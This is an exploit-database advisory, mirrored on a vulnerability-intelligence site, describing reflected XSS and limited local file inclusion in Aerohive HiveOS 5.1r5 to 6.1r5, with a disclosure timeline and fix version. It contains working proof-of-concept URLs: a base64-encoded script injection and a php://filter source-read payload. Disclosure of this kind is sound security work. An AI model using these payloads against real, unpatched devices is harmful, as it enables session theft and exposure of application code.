Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Aerohive HiveOS 5.1r5 < 6.1r5 - Multiple Vulnerabilities

🗓️ 12 Jul 2014 00:00:00Reported by DearBytesType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 33 Views

Aerohive HiveOS 5.1r5 < 6.1r5 contains XSS and limited LFI vulnerabilitie

Code
# Exploit Title: Aerohive HiveOS XSS and (limited) LFI
# Date: 11-07-2014
# Exploit Author: Rik van Duijn - DearBytes (dearbytes.com)
# Vendor Homepage: http://www.aerohive.com/products/overview.html
# Version: 5.1r5 - 6.1r5 (possibly earlier versions)

Description
================
Aerohive version 5.1r5 through 6.1r5 contain two vulnerabilities, one reflective XSS vulnerability and a limited local file inclusion vulnerability (I was only able to view source from one specific folder, maybe you can leverage this further). 
It's possible earlier version are affected, I was only able to review 5.1r5 briefly, the vendor indicated other version up to 6.1r5 are vulnerable as well.

Details
================
AeroHive  HiveOS Version:  5.1r5 until 6.1r5 (maybe available in earlier versions, was unable to test)
 
 
Vulnerability
================
An attacker could craft an URL in order to steal a session or attack the system of the visitor to the URL. The LFI can be leveraged to view application source code, limited to one specific folder.

 
Proof of concept XSS
====================
Base: http://<IP>/index.php5?ERROR_INFO=<BASE64 ENCODED JAVASCRIPT/HTML>
echo -en '"><script>alert('XSS');</script>' | base64
Add the output to the ERROR_INFO variable.

Example:
http://<IP>/index.php5?ERROR_INFO=Ij48c2NyaXB0PmFsZXJ0KERlYXJCeXRlcyk7PC9zY3JpcHQ+

Proof of concept LFI
====================
Base: http://<IP>/action.php5?_action=get&_actionType=1&_page=<LFI>

Example:
http://<IP>/action.php5?_action=get&_actionType=1&_page=php://filter/convert.base64-encode/resource=ManagementAP


Fix
================
The vulnerabilities were resolved in version 6.1r5.
 
 
Disclosure Timeline
================
 
2014-03-12: Reported to vendor
2014-03-12: Vendor confirmed, gave tracking-id
2014-03-18: Vendor confirms issues, states it received the vulns earlier and is already addressing the issues.
2014-04-02: Requested status update
2014-04-02: Vendor indicates they once the new version is released
2014-07-07: Requested status update
2014-07-07: Vendor indicated the update was previously published

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Jul 2014 00:00Current
7.4High risk
Vulners AI Score7.4
aerohive hiveosversion 5.1r5version 6.1r5xss vulnerabilitylfi vulnerabilitysession theftapplication source codebase64 encodedvendor disclosuresecurity update.
33